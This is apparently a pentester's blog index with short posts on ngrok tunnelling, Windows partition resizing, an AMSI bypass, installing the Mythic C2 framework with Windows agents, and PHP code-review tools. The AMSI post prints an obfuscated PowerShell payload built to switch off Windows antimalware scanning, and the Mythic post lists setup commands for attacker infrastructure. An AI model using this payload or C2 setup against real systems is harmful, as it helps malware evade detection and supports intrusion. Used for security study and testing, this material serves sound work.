Skip to main content

Posts

Host and Application locally and access it over the internet via ngrock

 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...
Recent posts

Extend Windows Partition Size - Fix `Extend Disk` greyed out

  open cmd and run "diskpart" # List the hard disk list disk # Select the hard disk select disk 0 # list the partitions list partition # Select the partition that you want to delete and allocate it to new partition # if you are allocating it on a VM, just create a new partition, assign a volume to it # then delete it select partition 4 #Delete the partition delete partition override now go to `Disk Management` --> right click on the partition that you want to extend #you should observe Extend disk is not grayed out Select "Extend Disk" and now you can increase the Partition size

AMSI Bypass Techniques

  use https://amsi.fail/ to generate AMSI Bypass techniques   $iu9nUCYfZjO831cZ6=$null;$t9jdZOULRwE6UwvmtJ="System.$([char]([bYTe]0x4d)+[ChAr]([byTe]0x61)+[char]([BYTe]0x6e)+[ChaR](97*82/82)+[CHaR](103*90/90)+[CHar](101*27/27)+[CHaR]([ByTe]0x6d)+[CHar](101)+[chAR]([bYTe]0x6e)+[CHar]([bYtE]0x74)).$(('Âútômâtì'+'ón').NorMAlIZe([ChAR](70*67/67)+[cHaR]([BYTE]0x6f)+[CHaR]([BYTE]0x72)+[ChaR](109*41/41)+[Char](68+8-8)) -replace [cHAR](92*77/77)+[cHaR]([bYTE]0x70)+[cHAr]([BYtE]0x7b)+[CHaR]([bYte]0x4d)+[Char]([bYTe]0x6e)+[ChAR]([Byte]0x7d)).$(('Ãm'+'sî'+'Ût'+'ìl'+'s').norMALIZe([CHAR](70*53/53)+[chAR](111)+[CHar](114)+[CHar]([BYtE]0x6d)+[CHar]([bYte]0x44)) -replace [CHAR]([ByTe]0x5c)+[cHAR]([BYTE]0x70)+[char](123*9/9)+[chaR]([Byte]0x4d)+[ChaR]([byTE]0x6e)+[cHar](125+3-3))";$sxynqfmtovfgaojvecwrzknwdq="+('kphjwgrxthc'+'úkígùõíqfày'+'lî').norMAlIze([CHAR]([byte]0x46)+[Char](68+43)+[chAR]([ByTe]0x72)+[ch...

Instaling Mythic C2 on Kali Linux

  Download the repo git clone https://github.com/its-a-feature/Mythic.git cd Mythic #Make the setup file sudo make Installing Docker sudo apt update sudo apt install -y docker.io sudo systemctl enable docker --now echo "deb [arch=amd64 signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/debian bookworm stable" | \ sudo tee /etc/apt/sources.list.d/docker.list curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg sudo apt update sudo apt install -y docker-ce docker-ce-cli containerd.io Log out of Kali Session and re-Login   Running Mythic #make sure you are in Mythic main Directory cd Mythic #Compile and generate the mythic-cli binary sudo make #Start Mythic - give it few mins to download and setup containers - first time only sudo ./mythic-cli start #Setup Payloads - Apollo for Windows sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo.git sudo ./mythic-cli install g...

Secure Source Code Review - PHP

  Semgrep #Installation pip install semgrep==1.54.3 #Use below script to run it; update the paths in the script wget https://raw.githubusercontent.com/Bhanunamikaze/PenTest-Scripts/refs/heads/main/semgrep_runner.py #Download the rules git clone https://github.com/Bhanunamikaze/SemgrepRules-PHP.git PHP Code Snipper Download phpcs.phar file from PHP_CodeSniffer Releases sudo apt-get install php-tokenizer php-xml php phpcs.phar /path/to/PHP_Code Visual Code Grepper https://github.com/nccgroup/VCG/tree/master GitHub - tcosolutions/betterscan: Code Scanning/SAST/Static Analysis/Linting using many tools/Scanners with One Report (Code, IaC) - Betterscan For NodeJS GitHub - insidersec/insider: Static Application Security Testing (SAST) engine focused on covering the OWASP Top 10, to make source code analysis to find vulnerabilities right in the source code, focused on a agile and easy to implement software inside your DevOps pipeline. Support the following technologies: Jav...